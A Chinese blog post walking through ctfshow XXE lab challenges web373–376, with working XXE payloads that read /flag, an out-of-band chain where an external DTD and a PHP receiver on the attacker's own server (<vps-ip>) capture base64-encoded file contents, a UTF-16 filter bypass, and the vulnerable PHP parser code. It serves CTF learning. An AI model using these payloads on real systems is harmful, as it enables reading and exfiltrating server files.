第四周任务

最新推荐文章于 2024-06-04 21:26:41 发布
最新推荐文章于 2024-06-04 21:26:41 发布
阅读量370 收藏 10
点赞数 5
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stronelu/article/details/137023205
版权

ctfshow靶场web入门XXE

1、web373

首先来到题目界面,我们看到的是源码:
在这里插入图片描述
通过分析知道,我们 最后输出的是储存在$ctfshow中的内容,所以,我们后续的操作目的就是将flag中的内容导入到ctfshow之中所以我们构造:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [<!ENTITY goodies SYSTEM "file:///flag">]>
<creds>
<ctfshow>&goodies;</ctfshow>
</creds>

随后我们进行抓包,将代码输入之后,我们就可以得到
在这里插入图片描述

2、web374

我们看到进来后,源码里面没有了echo $ctfshow,所以这道题的解决方式会有所不同
在这里插入图片描述
我们通过vps在服务器上构造两个文件:
首先1.php,将得到的东西转入其他文件:

<?php 
file_put_contents("test.txt", $_GET['file']) ; 
?>

之后构造xxe.xml:

<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://<vps-ip>/1.php?file=%file;'> ">
%dtd;
%xxe;

记得在服务器中建立一个叫test.txt的文件,这样一来我们就可以实现。<vps-ip>是用来提醒的,你要把这里改成你自己的服务器的公网ip

这样我们通过burpside抓包之后输入payload:

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://<vps-ip>/xxe.xml">
%aaa;
]>
<root>123</root>

我们就可以得到base64加密之后的flag之后后找一个base64解码的工具解码即可。
在这里插入图片描述

准确的说,我们将文件转入的不是简单的服务器的目录之下,我们首先要建立的是与域名一致的网页,通过宝塔,我们将文件载入到这个根目录之下的文件中,既可。

3、web375

之后我们来看web375,我们发现,这里对于xml,version=1或0进行了过滤,此时我们就需要通过utf-16编码之后payload即可:
在这里插入图片描述

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://<vps-ip>/xxe.dtd">
%aaa;
]>
<root>123</root>

修改在于将xml文件修改为dtd文件二者的功能导致了他们的后缀名在此处可以互换,而且起到的作用一致。
在这里插入图片描述

4、web376

在这里插入图片描述此时看到,代码进行了大小写转换和xml,version=1或0,只需要修改payload:

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);
stronelu
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTFshow XXE(web373-378)
Kradress的博客
03-18 510
post提交,这里外部引入vps的dtd文件。抓包发现username处存在回显。base64解码拿到flag。直接套八股文,拿到flag。这里需要一个根节点来包含。这里用python脚本。这里可以外部引入一个。
ctfshow web入门 XXE web373~web378
qq_62989306的博客
09-13 1122
burpsuite发包,不能用hackbar[POST]Payload: &xxe;
ctfshow xxe web373-378
2301_80553405的博客
03-30 550
我们需要获得当前目录下的flag数据,然后在本地服务器创建的dtd文件(创建与我们的服务器的联系),最后一个%send将实体解析,于是在题目的服务器下,将/flag文件里的数据通过实体%file通过get传参传入了get.php文件中并执行,于是触发命令,在本地服务器建立flag.txt并将flag写入了其中。ISO-8859-1(Latin-1):虽然不常见,但XML解析器通常也能够解析使用ISO-8859-1编码的XML文档。UTF-8:这是最常见的编码形式,也是许多XML文档默认使用的编码。
xxe漏洞——无回显(ctfshow web374——378)
最新发布
m0_73756016的博客
06-04 449
题目过滤的字符串,两个之间只有一个空格,我多打一个就变成了两个,不影响功能同时也绕过了过滤。导致了这题可以注入实体但是没有回显,所以我们考虑数据外带。访问一个请求,把数据加到请求上。但是我看我上题的payload也没有<\?xml version="1.0">在自己的vps上的test.dtd文件脚本。请求访问攻击者服务器的1337端口。和那个xxe lab撞js了;最后的引用来引用去的代码就相当于。比上题少了几行代码,分别是。空格绕过,我多打一个空格在。和上面那题比多过滤了大小写。查看我们flag的值。
CTFSHOW xxe篇
羽的博客
01-11 3248
web373 payload <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <yu22x> <ctfshow>&xxe;</ctfshow> </yu22x> web374、375、376 payload <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
wanan的博客
09-30 599
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
【CTF-Web】XXE学习笔记(附ctfshow例题)
jayq1的博客
05-29 981
XXE学习笔记
4第四周1
08-03
在Python编程中,程序的控制结构是构建逻辑流程的关键部分,它们决定了程序如何根据不同的条件执行不同的任务。本篇主要讨论了四种类型的程序控制结构:单分支结构、二分支结构、多分支结构以及条件判断的组合。同时...
PyTorchZeroToAll:DL-SEMINAR第1周任务
04-13
在本项目"PyTorchZeroToAll:DL-SEMINAR第1周任务"中,我们将会探索深度学习(Deep Learning)的基础,并通过使用PyTorch框架从零开始构建一个简单的神经网络。PyTorch是Python中广泛使用的开源机器学习库,以其灵活...
吴恩达CNN第一周作业
07-31
【压缩包子文件的文件名称列表】:“4.1编程作业”可能是指课程的第四个部分的第一个编程任务,这通常涉及到实际操作,比如编写代码实现简单的CNN模型,或者对预训练模型进行调整,以完成图像分类等任务。...
某年第一周开始日期实现方法
09-11
因此,当`DATEPART(DW, date)`的结果大于4时,意味着该年的第一天不是星期一,我们需要向前调整日期以找到第一周的开始。 给出的代码实现了一个名为`udf_StartDateOfFirstWeek`的用户定义函数,它接受一个整型参数`...
七周成为数据分析师第2周:业务
10-09
在“七周成为数据分析师”的课程中,第二周的核心主题是“业务”,这标志着学习者开始深入了解数据分析在实际商业环境中的应用。在这个阶段,你将接触到如何将数据分析技能与业务需求相结合,为决策提供有力支持的...
XXE-ctfshow373-378,7年老网络安全一次操蛋的面试经历
m0_60634927的博客
04-08 898
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
DTD(文档类型定义)介绍
qq_40321119的博客
10-18 2367
DTD简介 DTD中文意思是:文档类型定义,主要用来定义合法的文档结构(包括XML和HTML);可以声明在文档中,也可以作为外部的引用。 内部DTD声明 <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> ...
ctfshow-XXE(web373-web378)_ctfshow373
2401_84970250的博客
05-16 278
能编码简单理解就是(我的理解)input获取到数据后 先绕过正则 然后在操作xml的时候这个对象就能识别出是xml 因为xml支持utf-16 这时哪怕在xml声明编码方式为utf-8这也无所谓 这声明的只是xml内容为utf-8 但是整体过来是utf-16 这个对象是能识别出来的 然后看到这个声明为utf-8后再将内容设为utf-8的编码方式。使用一个不同的方式吧(原理都是一个意思) 为什么要绕一圈呢,就是因为在请求的时候 默认不允许将本地文件发送到dtd文件 间接的影响了我们的请求 所以要套一层。
自学黑客,一般人我劝你还是算了吧!
m0_74942241的博客
02-17 170
写在开篇 笔者本人 17 年就读于一所普通的本科学校,20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂,现就职于某大厂安全联合实验室。 我为啥说自学黑客,一般人我还是劝你算了吧!因为我就是那个不一般的人。
CTFshow——XXE
D.MIND 的博客
08-23 799
web373 <?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_i
XXE-ctfshow373-378,2024年最新高级网络安全面试题及答案
04-15 414
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。将1.dtd里ip设为nc的地址和端口就可以了。研究,那么很难做到真正的技术提升。
CTFshow web类(1~3)
qq_60399102的博客
09-12 85
这时候向闭合里拼接SQL语句就好了,使用order by来判断回显,但是始终没显示,一时间怀疑人生,虽然题目介绍是最简单的sql注入,但是还是在这一步卡了一会,参考了一下hint,还是菜了。这时候要提到limit的用法了,这个语句主要用来限制回显的,具体用法给个传送门。进入靶场,看到提示include,这一般是使用php伪协议,那么抓包构造一下表单。判断出字段数是三,回显位是第二位,剩下来的走一趟联合注入流程了。得到flag,这题主要了解一下limit的用法。进入页面是一个登陆表单,sql注入是了。
【中文】【吴恩达课后编程作业】Course 1 - 神经网络和深度学习 - 第四周作业(1&2)_https___blog.csdn.net_u013733326_article_details_7-CSDN博客.pdf
10-13
4. 反向传播函数:根据成本值计算出更新参数的梯度。 5. 更新参数函数:根据梯度和学习率更新模型的参数。 我们将会使用Python和NumPy库来实现这个神经网络模型。 首先,在初始化函数中,我们将会定义训练数据的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值